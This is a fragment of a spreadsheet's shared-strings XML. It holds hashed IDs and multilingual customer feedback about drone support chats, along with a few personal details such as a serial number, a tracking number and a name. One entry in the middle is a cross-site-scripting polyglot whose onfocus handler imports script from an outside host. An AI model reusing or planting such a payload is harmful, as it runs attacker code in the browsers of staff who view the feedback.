    <t>8QnggzSgCogOeh0ll6o7vA==</t>
  </si>
  <si>
    <t>368ae224685361d2428b8845d91883cf</t>
  </si>
  <si>
    <t>|82678101288878095942741</t>
  </si>
  <si>
    <t>ncaq5YMNPC6M/VE9APbpCzxzX0//TqynKy1V07kF41M=</t>
  </si>
  <si>
    <t>d57d49d9439dea9e7484ad0b9466d34f</t>
  </si>
  <si>
    <t>|82677483231951931689343</t>
  </si>
  <si>
    <t>7UfRrCX/cd1xzvKxfC1njQ==</t>
  </si>
  <si>
    <t>doesnt work</t>
  </si>
  <si>
    <t>G/QsaJrGA07TRX0Dlfn4OJdkx6JMTw8uVye4Fy4e2V0=</t>
  </si>
  <si>
    <t>11a36a2c38499e13daf8c5f86c4a42a8</t>
  </si>
  <si>
    <t>|82676245086434604660827</t>
  </si>
  <si>
    <t>HMwozd/7LmvuzF5+k7/hINRKCDAIOTJrMlP+v6ciIr4=</t>
  </si>
  <si>
    <t>af67d6f688a2c1b4caf6c0bb77a87b6b</t>
  </si>
  <si>
    <t>|82676618583648327892034</t>
  </si>
  <si>
    <t>PZELZrJ7+rJxsWctOKj9ctFZkAN5OMP5JSIrnxu3Jww=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>좋아요</t>
    </r>
  </si>
  <si>
    <t>jiwxG+SfYQoZwU39AZO2yFIx3Y5Srriiaby9UdM3L0Q=</t>
  </si>
  <si>
    <t>a067ebb1c9fc3462eb27e57d0d5f1afe</t>
  </si>
  <si>
    <t>|82675355466607721242401</t>
  </si>
  <si>
    <t>14dyfgyFz3gCXn1hxhDss+6DEnc5ELKXhwIhakK2xfg=</t>
  </si>
  <si>
    <t>someone at work to answer me would help</t>
  </si>
  <si>
    <t>mgPQXNRBdxZKVGDYsUhxwmLk/9yQZSGQXnTd7U45UBg=</t>
  </si>
  <si>
    <t>072c9e9f922724e3c88bf32b433b580b</t>
  </si>
  <si>
    <t>|82674364559815003381025</t>
  </si>
  <si>
    <t>Peaxg+LnKzS+r/wbFBohmA==</t>
  </si>
  <si>
    <t>237143a01cbf4544d53e8063e64a915b</t>
  </si>
  <si>
    <t>|82674398090475911664968</t>
  </si>
  <si>
    <t>yWgW4Nh1zhVC7TBe4HZTgnRjnFS5P2hCFlhefEK9W5U=</t>
  </si>
  <si>
    <t>Its not responsive</t>
  </si>
  <si>
    <t>NxdE5+11XDw8tRza8QgR7tapcN4N+RsYja6ekn5L0I0=</t>
  </si>
  <si>
    <t>da6da581b5f76efd8e71622665e6dfb5</t>
  </si>
  <si>
    <t>|82675277317064052433913</t>
  </si>
  <si>
    <t>O9fu4x4iqLKz3OQq0oS4MViQ8VIHeRIOAMerjgMijTg=</t>
  </si>
  <si>
    <t>At the time of flying the drone was accidentally fallen down and the gimbal was broken</t>
  </si>
  <si>
    <t>h5LeiEKZDXQKBQwT5sViML2VrW+mHvxlVgdy9qDj7Pw=</t>
  </si>
  <si>
    <t>3c9070abeb36cfb79458d37a77794e11</t>
  </si>
  <si>
    <t>|82674730633507033677448</t>
  </si>
  <si>
    <t>dbPjz/q8qRZNi7CHwrhdcqQkzlhhYV0Y0Hi/rdo6nWU=</t>
  </si>
  <si>
    <t>the screen just restarted before i could submit my message</t>
  </si>
  <si>
    <t>CPy/A7jobTosDuW8xXHIAYofA4xy3TEiMjuG+J0+YH4=</t>
  </si>
  <si>
    <t>89bfa9bdff16813763c017ac38d9c3e1</t>
  </si>
  <si>
    <t>|82674789602378682575624</t>
  </si>
  <si>
    <t>InT7ZQnlw1ArgJmEo1auL2LIGhvOHRp3FHY15MMm30g=</t>
  </si>
  <si>
    <t>no respons</t>
  </si>
  <si>
    <t>Gh7HKoznfN5nS6NNIPJ1WRuil8qatywUxwlQEXR0mTE=</t>
  </si>
  <si>
    <t>d1b525d6354482de0aa7810fe1513107</t>
  </si>
  <si>
    <t>|82674883664938203797695</t>
  </si>
  <si>
    <t>FSHVCWVDU70x1jzcbB0keocOsOwdQV7gx78ko66/ozo=</t>
  </si>
  <si>
    <t xml:space="preserve">Air2s caused injuries </t>
  </si>
  <si>
    <t>y0qtQRleteIQfenbjv5AtPtg2plka7Zh5zptZ//YCBA=</t>
  </si>
  <si>
    <t>89e3b94c5f957735b452263895d9dff1</t>
  </si>
  <si>
    <t>|82675054464623321874763</t>
  </si>
  <si>
    <t>BOBX4h9DOYpXzzscyGvGzVEWAFZyvQTg4/oa+/dm9oU+I8kxKEnFNYQfDYH9dXbF</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>빠른</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>응대</t>
    </r>
  </si>
  <si>
    <t>Hvq7Lkt/TZRr2TkoiL5qgTYga6t6HpcCB6uZ5X/uYcM=</t>
  </si>
  <si>
    <t>baef411f758ceb6c0859dbf32be30cbe</t>
  </si>
  <si>
    <t>|82673406784632004335029</t>
  </si>
  <si>
    <t>/0zQ12A7Ab7o4xVg9A0T3zYJW0MQGFK2HMjAhkrqiRc=</t>
  </si>
  <si>
    <t>Your previous email support was excellent! WHY AI?</t>
  </si>
  <si>
    <t>GCcBYBHhMQn8OfqqB5tW9PH6XYESWpVyqHmrmY/trtQ=</t>
  </si>
  <si>
    <t>3c7a30a26f972dd73c77296329975ff9</t>
  </si>
  <si>
    <t>|82673821232084170053094</t>
  </si>
  <si>
    <t>surmeda6s59zMwV0u2tDS4rPJYGPyQzy7UlDXafEZa0=</t>
  </si>
  <si>
    <t>Kundensupport</t>
  </si>
  <si>
    <t>7g47WsiIlNrrihbunY1Cpm6lr1ghZ6PK8c5500hetWE=</t>
  </si>
  <si>
    <t>15e491e3f759b3625133384ecea4c245</t>
  </si>
  <si>
    <t>|82674151159321350226885</t>
  </si>
  <si>
    <t>q4Py2pttyd3W9n0nzmfaySWpND8/kRMOft/N0M2w50k=</t>
  </si>
  <si>
    <t xml:space="preserve">Not able to address my issue </t>
  </si>
  <si>
    <t>nZOIDCbkSDr/lqmCue68MJDSKmJym9A85255pugeR0Y=</t>
  </si>
  <si>
    <t>31011d7f36ff76187b3f781afae2eadf</t>
  </si>
  <si>
    <t>|82672833327369858181011</t>
  </si>
  <si>
    <t>4xqGsvmqgF7ZSB/oBSb6OvJIK6Ic4Up34V5TAaSLJCg=</t>
  </si>
  <si>
    <t>Downloaded the app, started it, selected mavic 2 (no enterprise on there) tried to connect, error!</t>
  </si>
  <si>
    <t>pSAAzqeVGBrqod3Lz3eXaeE+T7Kp+VE5aI3ODPW0o4U=</t>
  </si>
  <si>
    <t>590d01f8f5c59e6558151889721f59c9</t>
  </si>
  <si>
    <t>|82672974092493606974590</t>
  </si>
  <si>
    <t>n5gHGmZLGe/8uIPaeMqWYuY1mtyUAqe/QuDkURaf0L4=</t>
  </si>
  <si>
    <t>6dd04d53e7ab331ee7e4a1115a88a5bb</t>
  </si>
  <si>
    <t>|82673230507468294552437</t>
  </si>
  <si>
    <t>y49zXT2yFC1fdNmOvIhnK86+f5lXGJoWN3259yJPIPA=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>너무</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>친절하세요</t>
    </r>
  </si>
  <si>
    <t>VKFgu1lSRsvFtWOfrYqGRAX4hhqTKCzEYmiq+7ekhAk=</t>
  </si>
  <si>
    <t>10587be079b93c5152dba90f0b94471c</t>
  </si>
  <si>
    <t>|82672685782653995830533</t>
  </si>
  <si>
    <t>n0blwpyWKtgueTVvDkyxzd5WfwHkm4P+hlTJP+07Ptg=</t>
  </si>
  <si>
    <t>did not address my query</t>
  </si>
  <si>
    <t>/x6M9Q0a9OW8bMgC7i0bFC9ud+zULpF+7ULwp6RmU8g=</t>
  </si>
  <si>
    <t>7808a757042352e4746ecfc18cba57a9</t>
  </si>
  <si>
    <t>|82671684628324408758084</t>
  </si>
  <si>
    <t>u7Nf+NZ6vyLF3+z/xG1xvg==</t>
  </si>
  <si>
    <t>bekomme gar keine Hilfe also überall</t>
  </si>
  <si>
    <t>QEWINirWWUMu0mbmg8xoOf8EtRHYPGExajLT/j1qzi8=</t>
  </si>
  <si>
    <t>0ea6c0af5b8babf88eafa9817ac48dfd</t>
  </si>
  <si>
    <t>|82671788162643677361461</t>
  </si>
  <si>
    <t>vze8UGsmR8zOnG1V+3lPS8PVguI93lZ+vUzVRBnAe+M=</t>
  </si>
  <si>
    <t>You disconnect before I can ask my question</t>
  </si>
  <si>
    <t>1gBrrz30/NA2/O6SUsrdVM9S1y6vlMLnQJ+jhIMoBM8=</t>
  </si>
  <si>
    <t>89a92c58443ce43a7308069d3240383a</t>
  </si>
  <si>
    <t>|82672014055829696527123</t>
  </si>
  <si>
    <t>XKtDHmGoRYTO5Nnht4M57Q==</t>
  </si>
  <si>
    <t>As I'm asking if DJI RC 2 is compatible to DJI Mavic Air model 2019, I get confusing answers</t>
  </si>
  <si>
    <t>lTZrLOAQR8pKSHfZHW5lsCf9bQB+ZsGDq9SggMGY4Nk=</t>
  </si>
  <si>
    <t>cdcfe2718ec58353d092d220da044597</t>
  </si>
  <si>
    <t>|82672197923756694169981</t>
  </si>
  <si>
    <t>WC85zd7RQbvMncxbhHMXmbZ1D6GdOl1qL0E4RkrR+Ss=</t>
  </si>
  <si>
    <t>Need to speak to a human just going around in circles like my drone!!</t>
  </si>
  <si>
    <t>bXT/7Vvw2oLMhAEU3oGJRJRx3SADJ/JOpc0eF2sYS5w=</t>
  </si>
  <si>
    <t>7c95e30812e140d68ff0baf487b141b1</t>
  </si>
  <si>
    <t>|82670941040064133269613</t>
  </si>
  <si>
    <t>1zWVcoLuFlvwptFFW+HJSyqGRdB6GNtjbiTk5UQBZHs=</t>
  </si>
  <si>
    <t>never got any service</t>
  </si>
  <si>
    <t>PBisbx3DMoGa06DMB6jJnAIZOVtsMiexJpl0kWEFNBk=</t>
  </si>
  <si>
    <t>906dad75b139ae7214796b04824e5e93</t>
  </si>
  <si>
    <t>|82670951186028177191477</t>
  </si>
  <si>
    <t>53MALNnSRGFt6PvwKK7UMTBAnjU0nzBE8HhTorNupKk=</t>
  </si>
  <si>
    <t xml:space="preserve">Prream was super helpful </t>
  </si>
  <si>
    <t>PPWZPaJxe+jIH0DthF03qb6wQnVqiQGpsWMZ06J+uJM=</t>
  </si>
  <si>
    <t>0e7b41f60d6cb14e74a75f54dcf9ad92</t>
  </si>
  <si>
    <t>|82671170871731565974507</t>
  </si>
  <si>
    <t>voDxeAiPXrzSyGzU0ZetHA==</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, sur le chargeur 3 batteries Néo, une des batterie affiche un seul voyant depuis 40 minutes </t>
  </si>
  <si>
    <t>WE5FP+8X4q8bAcvsMF+TqgDava9rIzQeUWJbw2sBwmw=</t>
  </si>
  <si>
    <t>2050646bd95694fed2decc5ac929ea45</t>
  </si>
  <si>
    <t>|82671303940165548363630</t>
  </si>
  <si>
    <t>pg60hkg37NvW2Yye3EAMnA==</t>
  </si>
  <si>
    <t xml:space="preserve">no response
</t>
  </si>
  <si>
    <t>7QSrIopm/ZBnhHRDUAyV+xa6HnOS8jPs8fF+CxBqIDM=</t>
  </si>
  <si>
    <t>7710bfb4a7b8a0c278f1be1a9fd121cf</t>
  </si>
  <si>
    <t>|82670285995313463528927</t>
  </si>
  <si>
    <t>ZneWHn6U2fDMz+R6qnOR8ZCH+/tYHXpJ5MR6/uMvs14=</t>
  </si>
  <si>
    <t>I was typing to describe the ptoblem and you have just deleted several minutes of my effort!</t>
  </si>
  <si>
    <t>5ctszqg3+1Ff5zpeF3Yodzg81CyvVeUH6muwul80df4=</t>
  </si>
  <si>
    <t>454d6033676f7b8e0da4f89fb124a379</t>
  </si>
  <si>
    <t>fb_store1</t>
  </si>
  <si>
    <t>|82670621453987051099827</t>
  </si>
  <si>
    <t>d5UTOLlyrHwxaKykyZOfW5DIbW/7QmanoCe77EzFD9Q=</t>
  </si>
  <si>
    <t xml:space="preserve">Good </t>
  </si>
  <si>
    <t>eUVLXF0uBEezMytL2ltxicQrnh642Khau9zXwY4Wy9Y=</t>
  </si>
  <si>
    <t>6359b09231193372f3428ac95753501e</t>
  </si>
  <si>
    <t>|82669364105889977157273</t>
  </si>
  <si>
    <t>JEbxMgn7qdTgrKRARpQrlw==</t>
  </si>
  <si>
    <t>I was typing a long message and suddenly the chat stopped! Where is all the text I already typed?!?!</t>
  </si>
  <si>
    <t>oG+ptgLaccXthHnWGLbS282QZGE3pNsAyy35WCw8szw=</t>
  </si>
  <si>
    <t>df4c88b688f48343510e42ea2dd4c12e</t>
  </si>
  <si>
    <t>|82669567490458865072495</t>
  </si>
  <si>
    <t>89FD6YzqhIf9PB3pfbtuSXtXXj6ffPtpDaeCTxnx9to=</t>
  </si>
  <si>
    <t xml:space="preserve">Very easy to locate where to go. </t>
  </si>
  <si>
    <t>E9wchq1cS8EDfWMxf53QrOP8dbdNpU896dS3sTppWvU=</t>
  </si>
  <si>
    <t>476cfb04b2749855e844ea6824722ef3</t>
  </si>
  <si>
    <t>|82668185319907068182349</t>
  </si>
  <si>
    <t>gO768tm1LiEZ5pWRRYPj8hsVJuClDUWaonMA04Ck6aw=</t>
  </si>
  <si>
    <t xml:space="preserve">It did not answer my question at all </t>
  </si>
  <si>
    <t>XaaTU3qytg4qljta/50zMEqgBClpJckchRB18dmc8Kk=</t>
  </si>
  <si>
    <t>5b27bf3ad01ff294fd1e3bc381a265b6</t>
  </si>
  <si>
    <t>|82668212691137651410946</t>
  </si>
  <si>
    <t xml:space="preserve">It didn’t answer my question at all </t>
  </si>
  <si>
    <t>d47c298b56bcab9fb7f79bdc118e3707</t>
  </si>
  <si>
    <t>|82668226698147905472631</t>
  </si>
  <si>
    <t>8FmXBd9aq3Me4MiAQsi+H9nMcqCHOoneYPYY9+INmQ0=</t>
  </si>
  <si>
    <t>You don't seem to have any support for Agras drones</t>
  </si>
  <si>
    <t>a5T4Z/lNLlNcunEou+Wpq3yWKZb1p7hXZmIUAjvvYNw=</t>
  </si>
  <si>
    <t>1fda6e138f25b4054b5def2159c32251</t>
  </si>
  <si>
    <t>|82669177946196908649548</t>
  </si>
  <si>
    <t>kXfxKdPUblZ8712AUKY6e/agMf98oWLbuOlbIMb6lCU=</t>
  </si>
  <si>
    <t>Only people can do this job</t>
  </si>
  <si>
    <t>fRv0AIq4rCBr4xKcGxJ0Nj6WylpnHfywILjtxFiB7hU=</t>
  </si>
  <si>
    <t>f248651680aa589836dc1907235db998</t>
  </si>
  <si>
    <t>|82668364178965114797396</t>
  </si>
  <si>
    <t>RHH0bhtpAAIbvyq9EVyQ1g==</t>
  </si>
  <si>
    <t>I clicked the button to start a live chat, but the dumb AI said, " I can only handle text requests."</t>
  </si>
  <si>
    <t>VB9pwLkvePUqSS+J8XYyDrGnm9Rs4mlvla3lnc8sHjY=</t>
  </si>
  <si>
    <t>b25fa4c8eb696d1037ac2e7f2c1d4d35</t>
  </si>
  <si>
    <t>|82668330124231202818974</t>
  </si>
  <si>
    <t>fH2dOcaDCk2wRHEDotam35R4EZjKB0Rxx+ao2bbIZ+8=</t>
  </si>
  <si>
    <t>'/*\'/*"/*\"/*&lt;/Script&gt;&lt;Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is?1=18163/.source))//&gt;</t>
  </si>
  <si>
    <t>CfZ+dAoG5uq1iK2/rby/8J6juMWRiPlcJzqBMeGnfDc=</t>
  </si>
  <si>
    <t>7b2bec2c4de18b3dc195a1e66f0ad1c9</t>
  </si>
  <si>
    <t>|82668322141009965478921</t>
  </si>
  <si>
    <t>D8bg/YjzMsJfLDD3R8r3vA==</t>
  </si>
  <si>
    <t xml:space="preserve">Do you send the products to other country? </t>
  </si>
  <si>
    <t>pJRKU2qWHvDe8WbStzhpCSrKntn9vKwy//VRSyGLT1g=</t>
  </si>
  <si>
    <t>c7efb1d1fb90708441fc8d2444283cd0</t>
  </si>
  <si>
    <t>|82668034454874307088975</t>
  </si>
  <si>
    <t>7yIRKWZgSLnQpuokJ7oXWw==</t>
  </si>
  <si>
    <t xml:space="preserve">Was difficult to get my question answered </t>
  </si>
  <si>
    <t>rLxh144wHY3C17z1xom2kEN3tStVOy7skONumWzHmTs=</t>
  </si>
  <si>
    <t>be29cbcd9f353c842c6e27fb281ead45</t>
  </si>
  <si>
    <t>|82667384822847980764557</t>
  </si>
  <si>
    <t>RFTUV5I/HKuS9tpgrGenKQ==</t>
  </si>
  <si>
    <t>it's unclear from the above if the DJI Neo can be used with the DJI RC-N3 controller while *simultan</t>
  </si>
  <si>
    <t>GoHUjg91laLuQExvnu/jK3OFP8GiomCKOuyrGRg5pNU=</t>
  </si>
  <si>
    <t>eedd1a306b26d04edf5bf926cff79f30</t>
  </si>
  <si>
    <t>|82666848096506064593318</t>
  </si>
  <si>
    <t>YAZ4rfeAzqatqNZOt7bSfw==</t>
  </si>
  <si>
    <t>NO RESPONSE - VERY POOR SHOW</t>
  </si>
  <si>
    <t>coMvnRtX32EY0jeQRnLhDLvnM6xAZXjwvL0DVBh/n+Q=</t>
  </si>
  <si>
    <t>317b29d8528aecc795a72dfd19b450ac</t>
  </si>
  <si>
    <t>|82666756601303336064907</t>
  </si>
  <si>
    <t>EDbuE9rC4qGPtnRgK0e7Dw==</t>
  </si>
  <si>
    <t>No real response</t>
  </si>
  <si>
    <t>o8/myHIaxwbrQV6FEPe1LHPJsMIJ8LEKjtsRI46JqYg=</t>
  </si>
  <si>
    <t>a2310ba643a89e656e6967c9b96fca35</t>
  </si>
  <si>
    <t>|82666580310977218667970</t>
  </si>
  <si>
    <t>EEaIWWj1DKL945TDZvBhRw==</t>
  </si>
  <si>
    <t xml:space="preserve">Didn't answer my question
</t>
  </si>
  <si>
    <t>0Cj8Jl/7OgwQl9/VXimS7xq9qbpn2p71BBR2hwiwsmo=</t>
  </si>
  <si>
    <t>2956755dd48f47260bfec83be5fcc771</t>
  </si>
  <si>
    <t>|82666593564687517417472</t>
  </si>
  <si>
    <t>alnj6bhOfKpQHejKlODJj21KzogwqKLChnTzX8+yjbQ=</t>
  </si>
  <si>
    <t xml:space="preserve">customer service </t>
  </si>
  <si>
    <t>iAW40pazQuwKI13XgKdjX4UI6GHd3QUT2dbTxpjBJtM=</t>
  </si>
  <si>
    <t>1960be91b113fce28677793fd247787b</t>
  </si>
  <si>
    <t>|82668356387091853379617</t>
  </si>
  <si>
    <t>qieJ2XDRRyF4nT3KfRPyIjO+krlZnaGSwwFyd77U1qc=</t>
  </si>
  <si>
    <t>never got a phone call or reply.</t>
  </si>
  <si>
    <t>N3mDOSwzRKpzcQETwoTTQg==</t>
  </si>
  <si>
    <t>48d674118594fd8ce3cf4e64a4b78890</t>
  </si>
  <si>
    <t>|82665893496464800592953</t>
  </si>
  <si>
    <t>572AnsFHDiotIW9GrG0JEA==</t>
  </si>
  <si>
    <t xml:space="preserve">Get real customer service. I have been on hold waiting for a person for nearly 20 minutes </t>
  </si>
  <si>
    <t>LFKXPA3ER04HdI6hQ+FjLIK2lzBUGDrAP/mRZJLVXA8=</t>
  </si>
  <si>
    <t>dceba08e157c791fb6211045f3a5dc30</t>
  </si>
  <si>
    <t>eu_sp9</t>
  </si>
  <si>
    <t>|82666809955535026630487</t>
  </si>
  <si>
    <t>N1b2cnrvqsSdR7odRnEtXgH1Rk4o8ekD75HJdfCHDaw=</t>
  </si>
  <si>
    <t>quick and very professional help</t>
  </si>
  <si>
    <t>0dERk6PsIkwhpIgM5athRkdEnT/6aktlp4OAtVO6tRM=</t>
  </si>
  <si>
    <t>4e6ecb98e89727e209c0eac22eb919ff</t>
  </si>
  <si>
    <t>|82665836941038780297258</t>
  </si>
  <si>
    <t>1vJqRqsJrkLUfC0EUhmskQ==</t>
  </si>
  <si>
    <t>If my drone is stolen, can I find it back by using GPS?</t>
  </si>
  <si>
    <t>4EfvovKdElUcjf7dnINvkj/bzV5aIzl2S13oDin3EoY=</t>
  </si>
  <si>
    <t>f15ca3309821206f72c96df787ab5594</t>
  </si>
  <si>
    <t>|82665832533383097396508</t>
  </si>
  <si>
    <t>vsO/3k3Nn2VPc/LLaqMH9o98gP6ATKmqsjICJQib4UY=</t>
  </si>
  <si>
    <t>1581F4XFC227F007BZY8 ich habe diese Mini 3 Pro gebraucht gekauft. ich kann das Konto nicht löschen</t>
  </si>
  <si>
    <t>tIj4cDrN+ESU0fBOxkMyVboZmDNjZpE/Q9BLnxuRilw=</t>
  </si>
  <si>
    <t>cdbd2174f055894e9726a13f45976823</t>
  </si>
  <si>
    <t>|82665859202763862475868</t>
  </si>
  <si>
    <t>uVPsWy8wNpkX9SqdJnYqlA==</t>
  </si>
  <si>
    <t>My mini 4 pro will not connect to wi fy in order to connect.
It will fly but will not fly beyond 50y</t>
  </si>
  <si>
    <t>JtEt1NIp5lGSOlXgqwqIxD7ZQ0guF2G6RzYdws4GeL0=</t>
  </si>
  <si>
    <t>254797ce4a670319b4a33198355e5a37</t>
  </si>
  <si>
    <t>|82665723217176086750835</t>
  </si>
  <si>
    <t>IfNhA9c9xkRnKFEKroFfYCVWiDMNYerhjOuyN1GGKoA=</t>
  </si>
  <si>
    <t>Hi i need help with dji avata 2, i need to fly indoor but keep saying ambient light low any adv</t>
  </si>
  <si>
    <t>/vNXkW5lcLGVyIVi67wn/OEPidRmUCJCO7LDO6c4N+M=</t>
  </si>
  <si>
    <t>d6082677998d5b704a0289a6a451a4e0</t>
  </si>
  <si>
    <t>|82664967411535091637737</t>
  </si>
  <si>
    <t>9EjJD935JWwnTKWSbW+mw9t2j1Kjo0GKKa22SF5gygA=</t>
  </si>
  <si>
    <t>Bonjour 
Mavic pro 2
Probleme de mise à jour quio echoue. ?</t>
  </si>
  <si>
    <t>qYrxa5KRiM1bl3kM+vY0ocYp8UDboeabXf+oiyOXUGI=</t>
  </si>
  <si>
    <t>d961bd74b20c3b1cd97049a2045803b8</t>
  </si>
  <si>
    <t>|82664919930964092527204</t>
  </si>
  <si>
    <t>Qpkl/NOo2yn155bM1yNwsQ==</t>
  </si>
  <si>
    <t>Iam getting error code 1581 in dji mini 4k
How can sali mu problem</t>
  </si>
  <si>
    <t>dPq9YARF5H8UksyyfLkogYimn8Dvb7V0PGxwvuz9MOs=</t>
  </si>
  <si>
    <t>b2ecb76bf941aefc4d845d0aeb8fcca1</t>
  </si>
  <si>
    <t>|82664883950615900856289</t>
  </si>
  <si>
    <t>ocQdjDudj4j/9n5fd4h3Pg==</t>
  </si>
  <si>
    <t>waste of my time.</t>
  </si>
  <si>
    <t>IueJYKzdwmWDxmk7CUCrSHcqMTlL7HU7IY5WUxFc4Uo=</t>
  </si>
  <si>
    <t>625df016981b9080ebf337d5320c3e2e</t>
  </si>
  <si>
    <t>|82665908261965219765702</t>
  </si>
  <si>
    <t>uJcxrfSfPAhhO0Wm0NnkJA==</t>
  </si>
  <si>
    <t>I thought I signed in and was talking to your assistant and still have got nowhere so not cool</t>
  </si>
  <si>
    <t>MOynDiR7i7MEonMZo3Mg753naWvm1diRc0f+owXKU+g=</t>
  </si>
  <si>
    <t>c4e9a180fd67b7883bbfd9135e26640f</t>
  </si>
  <si>
    <t>es_store1</t>
  </si>
  <si>
    <t>|82664973935208060527856</t>
  </si>
  <si>
    <t>nwjEDn7iofzK/Z3YyS+iTxtx3rANldy2aNVr3QYtkVg=</t>
  </si>
  <si>
    <t xml:space="preserve">Buenas
habla en español?
</t>
  </si>
  <si>
    <t>8lLuZJL64zpjrZxF4i5Se5KmzwIc47ORNsATZ2DJCcw=</t>
  </si>
  <si>
    <t>13f4bd664b503eb846050c0b4c759846</t>
  </si>
  <si>
    <t>|82663250414306631816446</t>
  </si>
  <si>
    <t>0Gpcq1/raBrZdyqJXSBOiw==</t>
  </si>
  <si>
    <t xml:space="preserve">The link did not work </t>
  </si>
  <si>
    <t>UppI0CkO0xCOy+8YU6CBbxo0DEfTimbAUIEQqLj2ODQ=</t>
  </si>
  <si>
    <t>67b17613d6a8736630b176c78e22bdf3</t>
  </si>
  <si>
    <t>|82663262191246777654074</t>
  </si>
  <si>
    <t>BwKzvTxtxAWLkyr/dXrAM1QB4u/XjT0kckPHxYC1WU8=</t>
  </si>
  <si>
    <t xml:space="preserve">I guess my message could not be answered or maybe in the future the N3 will support O4 Air unit
</t>
  </si>
  <si>
    <t>CwiYgqjAKX/Xy6DIi7QDzHqQP2kYpVRW+lQ5ZFPzZ/w=</t>
  </si>
  <si>
    <t>d872e0d5a101c6236ea6c07adedf0575</t>
  </si>
  <si>
    <t>de_sp2</t>
  </si>
  <si>
    <t>|82662478200534742023460</t>
  </si>
  <si>
    <t>Tkl661/XFu5RxrBM81eCLg==</t>
  </si>
  <si>
    <t xml:space="preserve">Reibungslose Abwicklung </t>
  </si>
  <si>
    <t>gVrMr1KVjiYAkyoO6gx/XSMgu4D8Ig0dQrXYeEABVVY=</t>
  </si>
  <si>
    <t>e52598cf03bdb688d759ccdd8d022339</t>
  </si>
  <si>
    <t>|82662691057662625374575</t>
  </si>
  <si>
    <t>kYWsTRMB4RY86y5JV5RnjzwMGZ7CDB0SU2yemFPzIa0=</t>
  </si>
  <si>
    <t xml:space="preserve">It keeps timing out as a fill out the form. Very frustrating as I have to start again. </t>
  </si>
  <si>
    <t>3YWXChJQag9crMLJmiQVaCAQmbL5367YNoGmONihJs0=</t>
  </si>
  <si>
    <t>d004df19830a1f7c78a82dfbcb4d3a8a</t>
  </si>
  <si>
    <t>|82660727651676181769402</t>
  </si>
  <si>
    <t>bo9A0oopo2ts7HALwRvmSg==</t>
  </si>
  <si>
    <t>J'ai soumis 2 fois mes questions et attendu plus de 10mn avant de voir fermer le chat
Dubau Noël</t>
  </si>
  <si>
    <t>YjvQPSZVnk/nLI52gSnsCf4z5GR8TdC6fCrjkqgw2g0=</t>
  </si>
  <si>
    <t>83ddaf681a2f6c7355213ce93363e934</t>
  </si>
  <si>
    <t>|82660783030639035997190</t>
  </si>
  <si>
    <t>NMyCzE2v+yJBQNRtsFkNUg==</t>
  </si>
  <si>
    <t>The goggles v2 and remote controller of dji fpv is compatible with avatar2 ??</t>
  </si>
  <si>
    <t>Xq8KhKX+0fbVMiByDU3mwTsufFAvXAdUxfivnQKMuOk=</t>
  </si>
  <si>
    <t>dfe2c2f8f8498d5fc51dfe99911f5021</t>
  </si>
  <si>
    <t>|82660809489409614580615</t>
  </si>
  <si>
    <t>cAtJ7seJfUtkoDIs3ZIl4qIIifr+ksWOP9PrLoIVs1s=</t>
  </si>
  <si>
    <t>Activate neo</t>
  </si>
  <si>
    <t>YyOeSa07bnDOQMiER1hqg72EgtrzOlOpMP68qMTxXxk=</t>
  </si>
  <si>
    <t>ee66ecc8c08a8e797925c42a04bcca12</t>
  </si>
  <si>
    <t>eu_mimo1</t>
  </si>
  <si>
    <t>|82661439494053621158248</t>
  </si>
  <si>
    <t>mgyksahF+8t68z9dNg10HFzz+1f2SEbSpINpDKUV3IcKcqB6XLusMILqpFEsBLCw</t>
  </si>
  <si>
    <t xml:space="preserve">No one got back to me </t>
  </si>
  <si>
    <t>hK7Zp4AR+dN8SMzLj4022SGDRaxwkx1VqTzAX600O+Q=</t>
  </si>
  <si>
    <t>077d8bfc1247f0a302b3e65732fc10a6</t>
  </si>
  <si>
    <t>|82659868816604362590834</t>
  </si>
  <si>
    <t>jtBXdffi6VCKDjmKyUr7yeOIpcffTgOaKulEGAOozM8=</t>
  </si>
  <si>
    <t xml:space="preserve">ne permet pas de répondre pour dji fly 
</t>
  </si>
  <si>
    <t>5LpY0FcRdCaPw95PW+XmA3GZINYEVDnOhQyM7xyUNT8=</t>
  </si>
  <si>
    <t>cf3a8916f35eb66bf14d3ef07b2e1705</t>
  </si>
  <si>
    <t>|82659945462604159847109</t>
  </si>
  <si>
    <t>MUhO8bhYrJ5JA26HdyP2zw==</t>
  </si>
  <si>
    <t xml:space="preserve">Session was ended because of non-response on YOUR part.  Why didn't you respond?  </t>
  </si>
  <si>
    <t>VerFF0p50s18iL5woMHLIxufMX/Zcf/nzcG22vr9q/g=</t>
  </si>
  <si>
    <t>53fbfeda6cf6739cdb6d723dadd530eb</t>
  </si>
  <si>
    <t>fr_store1</t>
  </si>
  <si>
    <t>|82660048245689130484177</t>
  </si>
  <si>
    <t>IAQWvR5L155YwBQSiIQX8w==</t>
  </si>
  <si>
    <t>Bonjour,
colis XW797257010JB devait m'être livré mardi 10 decembre, toujours pas arrivé...</t>
  </si>
  <si>
    <t>udg6NYj98H+8FeCXAb44VyieWs4hV/macpjg32gGTRM=</t>
  </si>
  <si>
    <t>7476b87967da718cfed6f93abd9109c2</t>
  </si>
  <si>
    <t>|82660068733456446780065</t>
  </si>
  <si>
    <t>PUxkLCb+LBNzL0yxIRwWA72vCGWWNS3ByP3jzqWr4QM=</t>
  </si>
  <si>
